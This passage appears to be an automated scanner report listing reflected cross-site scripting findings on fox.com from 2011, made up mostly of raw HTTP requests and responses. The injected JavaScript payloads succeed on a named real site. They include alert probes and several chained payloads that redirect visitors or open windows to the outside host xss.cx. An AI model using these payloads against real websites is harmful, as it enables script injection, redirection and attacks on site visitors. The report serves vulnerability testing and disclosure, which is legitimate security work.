Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598444908%3B%20s_dayslastvisit%3D1317596644910%7C1412204644910%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598444910%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22234
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:13:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704%22-window.open(%22httpfb967"-alert(1)-"6467b81c6be"
s_analytics.hier1="fox:shows:_ui:fox_player66704%22-window.open(%22httpfb967"-alert(1)-"6467b81c6be" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player66704%22-win
...[SNIP]...

2.226. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7639"-alert(1)-"30c9c963ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php/f7639"-alert(1)-"30c9c963ceb HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598444908%3B%20s_dayslastvisit%3D1317596644910%7C1412204644910%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598444910%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.108
Content-Type: text/html; charset=utf-8
Content-Length: 22234
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:13:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704%22-window.open(%22httpf7639"-alert(1)-"30c9c963ceb"
s_analytics.hier1="fox:shows:_ui:fox_player66704%22-window.open(%22httpf7639"-alert(1)-"30c9c963ceb" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player66704%22-win
...[SNIP]...

2.227. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 226e3"-alert(1)-"ddef4291199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui226e3"-alert(1)-"ddef4291199/js/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22164
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui226e3"-alert(1)-"ddef4291199:jscombinedjs"
s_analytics.hier1="fox:shows:_ui226e3"-alert(1)-"ddef4291199:jscombinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui226e3"-alert(1)-"ddef4291199:jscombi
...[SNIP]...

2.228. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/combinedjs.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73e68"-alert(1)-"46af491a7a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/js73e68"-alert(1)-"46af491a7a0/combinedjs.php?page=tracking HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 22136
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:55 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:js73e68"-alert(1)-"46af491a7a0combinedjs"
s_analytics.hier1="fox:shows:_ui:js73e68"-alert(1)-"46af491a7a0combinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:js73e68"-alert(1)-"46af491a7a0combined
...[SNIP]...

2.229. http://www.fox.com/_ui/js/fox_homepage_vars.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f36c"-alert(1)-"7498cf41b06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui7f36c"-alert(1)-"7498cf41b06/js/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22199
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:58:59 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui7f36c"-alert(1)-"7498cf41b06:jsfox_homepage_vars"
s_analytics.hier1="fox:shows:_ui7f36c"-alert(1)-"7498cf41b06:jsfox_homepage_vars" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui7f36c"-alert(1)-"7498c
...[SNIP]...

2.230. http://www.fox.com/_ui/js/fox_homepage_vars.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59c29"-alert(1)-"8064487c9c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/js59c29"-alert(1)-"8064487c9c1/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 22171
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:03 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:js59c29"-alert(1)-"8064487c9c1fox_homepage_vars"
s_analytics.hier1="fox:shows:_ui:js59c29"-alert(1)-"8064487c9c1fox_homepage_vars" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:js59c29"-alert(1)-"80644
...[SNIP]...

2.231. http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29dad"-alert(1)-"706770c3e2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui29dad"-alert(1)-"706770c3e2c/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php?date=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598276853%3B%20s_dayslastvisit%3D1317596476856%7C1412204476856%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598276856%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D82%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.103
Content-Type: text/html; charset=utf-8
Content-Length: 22439
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:10:12 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui29dad"-alert(1)-"706770c3e2c:js59c29%22-alert(document.location)-%228064487c9c1fox_homepage_vars"
s_analytics.hier1="fox:shows:_ui29dad"-alert(1)-"706770c3e2c:js59c29%22-alert(document.location)-%228064487c9c1fox_homepage_vars"
...[SNIP]...

2.232. http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cf38"-alert(1)-"fad2b22c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/js59c29%22-alert(document.location)-%228064487c9c18cf38"-alert(1)-"fad2b22c56/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php?date=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598276853%3B%20s_dayslastvisit%3D1317596476856%7C1412204476856%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598276856%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D82%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 22406
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:10:16 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:js59c29%22-alert(document.location)-%228064487c9c18cf38"-alert(1)-"fad2b22c56fox_homepage_vars"
s_analytics.hier1="fox:shows:_ui:js59c29%22-alert(document.location)-%228064487c9c18cf38"-alert(1)-"fad2b22c56fox_homepage_vars" //Site Content Hierarchy
s_analytics.hier3="enter
...[SNIP]...

2.233. http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7064e"-alert(1)-"1ed04ee39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php7064e"-alert(1)-"1ed04ee39f?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/js59c29%22-alert(document.location)-%228064487c9c1/fox_homepage_vars.php?date=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598276853%3B%20s_dayslastvisit%3D1317596476856%7C1412204476856%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598276856%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B%20s_ppv%3D82%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22298
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:10:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
s.prop8="fox:shows:_ui:js59c29%22-alert(document.location)-%228064487c9c" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:js59c29%22-alert(document.location)-%228064487c9c1fox_homepage_vars.php7064e"-alert(1)-"1ed04ee39f"
s_analytics.prop15="sub section:fox_homepage_vars" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analy
...[SNIP]...

2.234. http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51f89"-alert(1)-"65f4a9e9c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui51f89"-alert(1)-"65f4a9e9c7a/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php?date=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598831630%3B%20s_dayslastvisit%3D1317597031632%7C1412205031632%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598831632%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22373
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui51f89"-alert(1)-"65f4a9e9c7a:js59c29%22-window.location.assign(%22httpfox_homepage_vars"
s_analytics.hier1="fox:shows:_ui51f89"-alert(1)-"65f4a9e9c7a:js59c29%22-window.location.assign(%22httpfox_homepage_vars" //Site Content H
...[SNIP]...

2.235. http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40491"-alert(1)-"e6bb8e09af1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/js59c29%22-window.location.assign(%22http:40491"-alert(1)-"e6bb8e09af1//xss.cx%22)-%228064487c9c1/fox_homepage_vars.php?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php?date=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598831630%3B%20s_dayslastvisit%3D1317597031632%7C1412205031632%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598831632%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 22233
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:js59c29%22-window.location.assign(%22htt" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:js59c29%22-window.location.assign(%22http40491"-alert(1)-"e6bb8e09af1"
s_analytics.prop15="sub section:fox_homepage_vars" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analy
...[SNIP]...

2.236. http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df3ec"-alert(1)-"0fcc499bca2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/df3ec"-alert(1)-"0fcc499bca2?date= HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/js59c29%22-window.location.assign(%22http://xss.cx%22)-%228064487c9c1/fox_homepage_vars.php?date=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598831630%3B%20s_dayslastvisit%3D1317597031632%7C1412205031632%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598831632%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22249
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
